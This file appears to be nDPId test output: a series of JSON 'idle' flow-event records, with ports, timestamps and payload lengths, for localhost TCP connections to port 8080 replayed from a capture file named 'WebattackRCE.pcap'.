-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 